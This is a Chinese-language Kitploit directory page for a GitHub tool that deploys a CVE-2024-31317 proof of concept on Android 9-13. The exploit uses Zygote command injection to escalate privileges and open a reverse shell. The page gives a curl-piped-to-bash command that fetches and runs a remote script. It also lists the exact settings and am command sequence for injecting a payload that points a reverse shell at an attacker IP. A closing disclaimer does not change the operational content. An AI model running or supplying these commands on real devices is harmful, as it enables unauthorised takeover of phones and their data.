Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-31317-PoC-Deployer — 用于在 Android 9-13 上自动化部署 CVE-2024-31317 PoC 的工具,可通过 Zygote 注入实现权限提升并执行反向 Shell。 | Kitploit
工具/GitHubGitHub/webldix/cve-2024-31317-poc-deployer
Android安全权限提升漏洞利用Shellcode渗透测试移动安全Payload 开发二进制利用
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
webldix/cve-2024-31317-poc-deployer

CVE-2024-31317-PoC-Deployer

用于在 Android 9-13 上自动化部署 CVE-2024-31317 PoC 的工具,可通过 Zygote 注入实现权限提升并执行反向 Shell。

查看仓库
528671年前Kitploit 审核通过

CVE-2024-31317-PoC-Deployer

Android Version Patch Level License

A deployment tool for CVE-2024-31317 proof-of-concept exploit targeting Android 9 through 13 devices.

📝 项目描述

CVE-2024-31317-PoC-Deployer 是一个自动化部署脚本,用于快速生成和配置 CVE-2024-31317 漏洞利用所需的全部文件。该漏洞影响 Android 9 到 13 的设备,允许通过 Zygote 进程实现权限提升并执行任意代码。

🚨 漏洞信息

  • CVE ID: CVE-2024-31317
  • 影响范围: Android 9 到 Android 13
  • 修复版本: 2024年6月补丁级别及以后的Android版本
  • 漏洞类型: Zygote进程命令注入
  • 所需权限: WRITE_SECURE_SETTINGS

📦 包含文件

  • reverse_shell.c - C语言实现的反向shell程序
  • payload.txt - 特殊构造的漏洞利用payload
  • compile.sh - 自动编译脚本
  • README.txt - 详细使用说明
  • CVE-2024-31317.txt - 漏洞技术分析文档

🛠️ 快速开始

  1. 运行远程部署脚本:

    root@kitploit:~
    pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
    
  2. 编译反向shell:

    root@kitploit:~
    sh compile.sh
    
  3. 运行反向shell监听器:

    root@kitploit:~
    sh reverse_shell
    

💣 漏洞利用步骤

  1. 上传 payload.txt 到目标设备的 /data/local/tmp/
  2. 替换 payload.txt 中的 xxx.xxx.xxx 为你的监听服务器IP
  3. 在目标设备上执行以下命令序列:
    root@kitploit:~
    am force-stop com.android.settings
    cd /data/local/tmp/
    settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
    am start -n com.android.settings/.Settings
    settings put global hidden_api_blacklist_exemptions "null"
    

⚠️ 免责声明

此工具仅用于合法的安全测试和研究目的。使用前必须获得目标系统的明确授权。未经授权的使用可能违反法律。开发者不对任何滥用行为负责。

📜 许可证

本项目采用 MIT 许可证 - 详情请参阅 LICENSE 文件。

📚 技术参考

  • Android Security Bulletin - June 2024
  • CVE-2024-31317 Details
下载工具